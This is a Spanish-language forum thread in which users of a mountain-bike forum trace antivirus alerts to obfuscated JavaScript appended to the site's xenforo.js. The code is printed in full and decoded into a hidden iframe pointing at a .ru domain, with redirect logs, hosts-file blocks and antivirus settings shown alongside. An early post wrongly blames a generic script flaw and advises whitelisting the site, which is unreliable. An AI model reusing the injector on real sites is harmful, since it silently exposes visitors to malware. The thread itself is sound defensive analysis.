Tiene virus y no pocos además. En el móvil usando tapatalk funciona ok, pero si entro desde el navegador virus y virus y virus.
El problema viene dado por el uso de un script que se utiliza en la pagina para poder hacer login, se utiliza una herramienta bastante utilizada en la programacion html para varios usos en los que se necesite el acceso a una base de datos, como puede ser por el ejemplo la base de datos donde se almacenan el usuario y contraseña. Es script en concreto es un js/iframe eq, que es el cuadrito del login y cuando estamos logeados al pasar el cursor del raton por encima nos muestra las alertas, privados, etc. El problema es que a estos escripts se les detecto hace tiempo una vulnerabilidad que en paginas maliciosas podia ser usado para redirigir al usuario a otras paginas y asi poder hacer un phising a la par que instalar un troyano en el equipo del usuario. Eso no quiere decir que todas las paginas lo hagan, de hecho la incidencia de troyanos mediante este script es inferior al 1% mundial de infecciones. Aun asi cuando suele haber un repunte de infecciones por el ( en otros lugares del mundo, actualmente el mas afectado es la india ) los antivirus lo meten entre sus alertas y en detectarlo lo bloquean. Lo mejor para evitar problemas cuando algo asi nos pase con la pagina del foro o cualquier otra es antes de loguearnos o hacer uso del iframe es analizar la pagina con escaneo de antivirus externo, como por ejemplo con la pagina web de virus total https://www.virustotal.com/es/ Y este es el resultado que he obtenido del escaneo que acabo de hacerle justo hace un momento... https://www.virustotal.com/es/url/9...e1fd00d206314092e1d5ed2b/analysis/1441265551/ Segun el reporte del escaneo ha sido escaneado por 63 analizadores de virus y ninguno de ellos ha detectado infeccion alguna, por lo que la pagina es segura. Para evitar tener que estar activando y desactivando el antivirus los mejor es incluir la direccion del sitio en las excepciones del antivirus para que no bloquee la pagina y seguir utilizandola sin problema. Espero que os sea de utilidad compañeros. Saludos!!!
Buena respuesta Eficaz, haciendo honor a tu nick. Justo iba a escribir que no se debe confundir que tu antivirus detecte una amenaza, con que esto sea un virus y que realmente pueda llegar a infectarte. Sin estar del todo seguro, creo que la vulnerabilidad del js/iframe esta corregida en la actualización de marzo o abril(no recuerdo bien). Esto me recuerda a cuando bajas algún programa de confianza de la administración pública y windows lo detecta como una amenaza solo porque ellos no lo han certificado como seguro, con el consiguiente daño de credibilidad por parte del desarrollador del software. Hay cosas que el dinero puede comprar.... para todo lo demas UBUNTU!!! jejeje
No es exactamente eso, por lo menos en este caso y lo que yo estoy viendo. El problema es una publicidad que aparenta ser la carga de un jpg. (ofusco la url para evitar lios) hzzzzzzzzzzp://cdn(punto)amazoncdnimg(punto)ru/img303/?Img505jpeg Que luego redirige a: hzzzzzzzp://img(punto)amazoncdn8(punto)ru/search?q=fxcW&Mjm=41cf7808f8&7wNmJCC=eMT&XDdCs5y=muchos numeros y letras o hzzzzzzzp://img(punto)amazoncdn9(punto)ru/search?q=fxcW&Mjm=41cf7808f8&7wNmJCC=eMT&XDdCs5y=muchos numeros y letras El antivirus salta: Estos segundos enlaces son los problemáticos ya que intentan explotar vulnerabilidades. Son dominios que están en la lista negra de los antivirus y por eso saltan las alarmas, palabrita de Nod32, Panda y firewall empresarial con URL filter. La solución temporal es añadir los dominios .ru antes dichos al fichero hosts local direccionandolos a 127.0.0.1 (localhost), así nunca cargará el virus. como se modifica el fichero hosts: http://archivogeek.com/2433/editar-archivo-hosts-en-windows-7-y-windows-vista/ El fichero HOSTS quedaría algo así como: CODE, HTML o PHP Insertado: # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 127.0.0.1 amazoncdnimg.ru 127.0.0.1 amazoncdn1.ru 127.0.0.1 amazoncdn2.ru 127.0.0.1 amazoncdn3.ru 127.0.0.1 amazoncdn4.ru 127.0.0.1 amazoncdn5.ru 127.0.0.1 amazoncdn6.ru 127.0.0.1 amazoncdn7.ru 127.0.0.1 amazoncdn8.ru 127.0.0.1 amazoncdn9.ru 127.0.0.1 amazoncdn10.ru Despues de esto ejecutais cmd (simbolo de sistema) en modo administrador y vaciais la cache de la resolucion DNS CODE, HTML o PHP Insertado: Microsoft Windows [Versión 10.0.10240] (c) 2015 Microsoft Corporation. Todos los derechos reservados. C:\WINDOWS\system32>ipconfig /flushdns Configuración IP de Windows Se vació correctamente la caché de resolución de DNS. C:\WINDOWS\system32> Ojo, cuando el atacante cambie el dominio hay que volver a empezar, la solución la tiene el webmaster de foromtb que tiene que revisar a quien vende espacios de publicidad y controlar los mismos. Tambien podria ser que hubieran explotado alguna vulnerabilidad de XEN Foros y hubieran inyectado el código para que cargue el virus cada vez que se refresca la página. Muchas veces al utilizar un servidor intermedio que hace de pasarela (el dominio amazoncdnimg(punto)ru) les permite determinar si el cliente es legitimo o es un escaneador de virus, muchas veces lo hacen geolocalizando la IP o si corresponde a los rangos de operadores concretos (telefonica, ono, jazztel etc....), es decir, si es un escaneador con ip de EEUU u otro sitio muestro una imagen, pero si es una ip de una posible victima le cargo un virus o publicidad maligna. Este comportamiento ya lo había observado en algunas webs de wordpress infectadas pero al revés, cuando entrabas desde España mostraba la web perfectamente compuesta, es decir el propietario no se daba cuenta de nada, pero cuando lo hacias desde EEUU te sacaba publicidad e intentos de SCAM.
Yo normalmente en mis navegadores tengo activado ad-block por lo que no me carga ninguna imagen de publicidad ni ventanas emergentes ( bloqueadas en el navegador ) por lo que a mi sólo me identifica la posible infección del Script del iframe. De todas maneras al analizar la página externamente no se detecta infección alguna. De todas maneras no está de más hacer una navegación "defensiva" cuando buceamos por la red. Siempre hay que evitar hacer clic en las imágenes y/o ventanas publicitarias. En caso de duda siempre botón derecho y copiar url al portapapeles y abrir una nueva pestaña. Abrir alguna página de análisis antivirus como la virustotal, panda , karpesky, etc. y pegar la url donde nos pida la dirección de la página web a investigar. Si nos indica que es segura pues seguimos navegando. A mi el bloqueo del avast consistió en bloquear todos los iframes que contuvieran consultas a base de datos bajo java ( j query ) por lo que bloquea los emergentes de las alertas y los formularios como los de escribir las respuestas. Últimamente java está siendo ninguneada para que suba html5 un lenguaje que según parece está empezando a derivar en una menor privacidad de los usuarios.... En fin ya se irá solucionando. De mientras habrá que ir adoptando las distintas soluciones que van aportando los compañeros. Saludos!!!!
Lo estaba comprobando paralelamente sin saber de este hilo, os copio lo que pude descubrir hasta el momento. Es coincidente con lo ya dicho, lo cual es bueno. Al final de http://www.foromtb.com/js/xenforo/xenforo.js?_v=fa6a05d8 aparece el siguiente código JavaScript: CODE, HTML o PHP Insertado: var Bacc,aaaBaaaBa,caaaBaac,BaaBcBaa;caaaBaac = eval;Bacc ="";aaaBaaaBa = new Array();aaaBaaaBa.push('%d#@#@o@@@#%c@@#um#@');aaaBaaaBa.push('@@e#!nt.writ#@@@e#!(');aaaBaaaBa.push('\'<i@#@#f@@#r%@a~@@#m');aaaBaaaBa.push('#@@@e#! sr@@@#%c@@#=');aaaBaaaBa.push('\"http://@@@#%c@@#%d#');aaaBaaaBa.push('@#@n.%@a~@@#m%@a~@@#');aaaBaaaBa.push('zon@@@#%c@@#%d#@#@ni');aaaBaaaBa.push('mg.ru/img303/?Img505');aaaBaaaBa.push('jp#@@@e#!g\" wi%d#@#@');aaaBaaaBa.push('th=\"1\" h#@@@e#!ight=');aaaBaaaBa.push('\"0\" @#@#f@@#r%@a~@@#');aaaBaaaBa.push('m#@@@e#!@#@%@b@or%d#');aaaBaaaBa.push('@#@#@@@e#!r=\"0\"></i@');aaaBaaaBa.push('#@#f@@#r%@a~@@#m#@@@');aaaBaaaBa.push('e#!>\');');function aaBBc(str) { return str.replace(/[!%#@~]/g,""); }for (var j=0;j<aaaBaaaBa.length;j++) {Bacc = aaBBc(aaaBaaaBa[j]);BaaBcBaa += Bacc;}caaaBaac(BaaBcBaa.substr(9)); Que esté justo al final, ya es sospechoso de por sí, y el modo de tratar de disimular lo que hace, todavía más. Una vez aclaramos esa guarrería que trata de que antivirus y similares no detecten lo que pretende (felicidades, Avast!), lo que hace ese código es insertar este código HTML: CODE, HTML o PHP Insertado: <iframe src="http://cdn.amazoncdnimg.ru/img303/?Img505jpeg" width="1" height="0" frameborder="0"></iframe> Eso sirve para incluir una página dentro de otra por un medio obsoleto ya en HTML desde hace años, pero aun funcional y lo hace ocultando la página insertada al asignarle una altura de cero píxeles. De este modo, junto con la página del foro, estamos visitando también otra rusa sin saberlo. La página que se inserta es una llamada que responde lo siguiente: CODE, HTML o PHP Insertado: HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 03 Sep 2015 18:18:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.3 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Thu, 03 Sep 2015 18:18:45 GMT Cache-Control: max-age=0 Pragma: no-cache LOCATION: http://img.amazoncdn7.ru/search?q=aXQ1UURkeRA1eWQceBx9ZWQZMV&H05H=cdeA0&HSz=3f902f4&0DBRx=eQQ..&O16GZt=d8Q&4mAq4=bQ5RTg4MVw&SQN=5cd1a40f6 Eso produce un redireccionamiento. La dirección a la que nos lleva es diferente cada vez, si bien todas son del mismo estilo: CODE, HTML o PHP Insertado: http://img.amazoncdn7.ru/search?q=c8DWQJK&B5dovJV=eGhMX&X5r=aXQ1UURkeU1&NPb5LXt=boHDR1RSApdU0&M4n=5cdc983&BsBJ6B=dWw8BUA0H&KOS=5f1264f http://img.amazoncdn7.ru/search?q=cWQJKWw8BUA0HGhMX&JyVon7z=bdU08D&Zftxx8=aXQ1UURkeU1oHDR1RSAp&G1r=113b96d1c&DPG=990d8b9 http://img.amazoncdn7.ru/search?q=29d67e&YPgZn24=bhWAAl&SMwI=07b7b8daa8&JC0qa=aXQ1UURkeXA&IEYmC=cUSFBMXQwFGgJdVRsNWgBUWlZMRhY. Finalmente, estas direcciones, llevan a un error 444 (No hay respuesta) del servidor nginx. CODE, HTML o PHP Insertado: HTTP/1.1 444 Server: nginx Date: Thu, 03 Sep 2015 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.12-1~dotdeb+7.1 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
Yo me pierdo con todo esto Entonces la solución sería desactivar ese script, no? Eso lo pueden hacer los de foromtb, o es tema de xenforo?
los iframes forman parte de la plantilla de xenforo, las cabeceras y pie de pagina es cosa de la administracion del foro. Saludos!!!!
Lo primero es averiguar cómo ha llegado ese script hasta ahí. Con eso solo puedo especular. Para quienes nos están leyendo y no pueden responder porque no se atreven a apagar el antivirus (bien hecho) y no pueden entrar de otro modo, el parche menos peligroso mientras se arregla, entendiendo que la imagen desde la que se realizaba el presunto ataque ya está retirada del servidor ruso, es aceptar el script del foro y bloquear la web rusa. Eso nos deja vulnerables a otro ataque del mismo tipo hecho desde el foro que tome el código para el iframe de otro servidor diferente. Para ello, hay que abrir la pantalla principal de Avast! y pulsar abajo a la izquierda en "Opciones". En la ventana de opciones, en el menú de la izquierda,pulsar en la segunda "Protección activa" Y en escudo web, pulsar en "personalizar" Pulsamos la tercera opción de la izquierda "Exclusiones" Dejamos marcada la casilla "URLs a excluir" y agregamos lo siguiente: http://www.foromtb.com/js/xenforo/xenforo.js* Vamos a "Exclusiones de script", dejamos marcada la casilla "URLs a excluir" y agregamos de nuevo lo siguiente: http://www.foromtb.com/js/xenforo/xenforo.js* Ahora pulsamos en "Bloqueo URL" Marcamos activa la casilla "Activar bloqueo del sitio" y agregamos lo siguiente: http://cdn.amazoncdnimg.ru/* Pulsamos en "Aceptar" (El paso de desactivar y activar tal vez sea innecesario) Nuevamente en la ventana de Opciones - Protección activa, junto a "Escudo web" pulsamos el "Activado" para desactivar la protección de la web, con la finalidad de reiniciarla, quitando el bloqueo actualmente en vigor, seleccionamos 10 minutos y aceptamos la advertencia de detener componente. El menú de 10 min y el aviso no tengo medios para capturarlo con facilidad y mostrarlo. Esperamos unos segundos y para reactivarla, pulsamos el botón que ahora está gris indicando que el Escudo Web está desactivado. Ya podemos pulsar en Aceptar y cerrar la ventana principal de Avast! En las pestañas donde no aparecía el espacio para responder, pulsamos Ctrl+F5 para recargar y refrescar la caché. Con esto, dejamos el sistema vulnerable a lo que venga a través del script del foro, pero únicamente a ese punto, no es más inseguro que cambiar a un antivirus que no lo bloquea y sí es más seguro que desactivar de modo general el antivirus.
Me quito el sombrero, has dado en el clavo, yo me he quedado en la cascarilla siguiendo únicamente el payload, pero tu has descubierto el origen del problema y donde exactamente está. solo falta algún webmaster para que solucione el problema. Aunque debería revisar los permisos de los js y securizar el server con algún sistema dinámico de autoprotección (detección de crawlers, escaneadores de URL, algún autoban etc....). Enhorabuena. Buen trabajo
Gracias, compañero. Tú también lo tenias rodeado ya y no somos los únicos, solo que cada uno lo llevaba por su cuenta. Cuando hace unos días dejó de funcionarme el foro, primero pensé que era cosa de mi sistema. Como tras reiniciarlo tampoco funcionó, entonces pensé que era fallo del foro. Pasado un tiempo, viendo que los compañeros seguían publicando empecé a sospechar que fuese la última actualización de Java, que más o menos me coincidía en el tiempo. Pasé de usar Firefox para el Foro a Chrome y me lo resolvió temporalmente (cachés, coincidencias, a saber...). Ayer dejó de funcionarme en Chrome y ya me empecé a mosquear. Buscando di con que el Avast! me estaba bloqueando un script del foro y ahí empecé a investigar. No quise desactivarlo, el PC lo uso para trabajar y no me la juego a darle paso a un presunto troyano. Cuando cargué el script suelto, sin ejecutarlo, el Avast! recién reiniciado lo bloqueaba a medio cargar, ahí ya se dispararon las sospechas de que estaba bloqueando algo relevante. Como solo lo cargaba como texto, sin ejecutar, deshabilité temporalmente el "escudo web" para leer el script completo. Ahí apareció el código sospechoso, al final del archivo. Con esas ideas ya en mente, sabía que tenía que estarle sucediendo a mucha más gente, de modo que busqué y en http://www.foromtb.com/forums/problemas-y-sugerencias-en-foromtb-com.13/ ya había varios hilos abiertos del tema. A falta de poder comentar nada, dí unos likes y me busqué un tablet, confiando en que en Android sería menos arriesgado y que en todo caso, el tablet lo formateo y me quedo tan ancho. Ya a partir de ahí, el resto quedó a la vista Ahora es cuestión de advertir a los admin para que localicen y tapen el agujero por donde entró el ataque, además de borrar el script agregado. ¿Alguien los conoce?
El problema es que el script es parte de la plantilla de xen foro por lo que los administradores de foromtb supongo que poco podran hacer por que las herramientas que les proporcionara el servicio iran poco mas alla de poner publicidad en la cabecera y en ventanas emergentes... Lo que si que podran hacer es reportar el problema al administrador del servicio de xen foro que sera el que tendra que solucionar el problema. Podras consultar y reportar el problema en el foro de las comunidades de xen foro https://xenforo.com/community/ que es en ingles a ver si por alli le pueden dar solucion al problema, mi ingles y mis conocimientos informaticos no son demasiado elevados como para hacerlo yo... Saludos!!!!
Mil gracias cracks!!! ... es el primer post que escribo desde el PC en lo que va de semana Una pregunta: ¿Cuándo / cómo sabremos cuando podemos volver a configurar el avast como estaba, sin excluir del análisis la URL "http://www.foromtb.com/js/xenforo/xenforo.js*" y eliminando el bloqueo sobre la URL "http://cdn.amazoncdnimg.ru/*"?
No conozco detalles ni de XenForo ni de foromtb. Por lo poco que he visto, el hosting es independiente, de modo que igual que instalaron el foro, podrán actualizarlo y/o modificarlo. CODE, HTML o PHP Insertado: ~# dig -t any www.foromtb.com ; <<>> DiG 9.8.1-P1 <<>> -t any www.foromtb.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8103 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0 ;; QUESTION SECTION: ;www.foromtb.com. IN ANY ;; ANSWER SECTION: www.foromtb.com. 300 IN A 217.160.177.4 ;; AUTHORITY SECTION: foromtb.com. 172800 IN NS ns12.zoneedit.com. foromtb.com. 172800 IN NS ns15.zoneedit.com. ;; Query time: 236 msec ;; SERVER: 192.168.0.2#53(192.168.0.2) ;; WHEN: Fri Sep 4 13:27:47 2015 ;; MSG SIZE rcvd: 96 La IP corresponde a s18005874.onlinehome-server.info, no tiene pinta de ser proporcionado por XenForo. Llegados a este punto, desde fuera poco más puede verse, /js/xenforo/xenforo.js tiene un código agregado al final que, por su aspecto, no se ha introducido ahí legítimamente, hay que limpiarlo y evitar que se repita.
La pregunta es buena, si alguien nos advierte que ya se ha resuelto, o probando vemos que ya funciona sin esa configuración, es cuestión de avisarnos aquí mismo al resto.
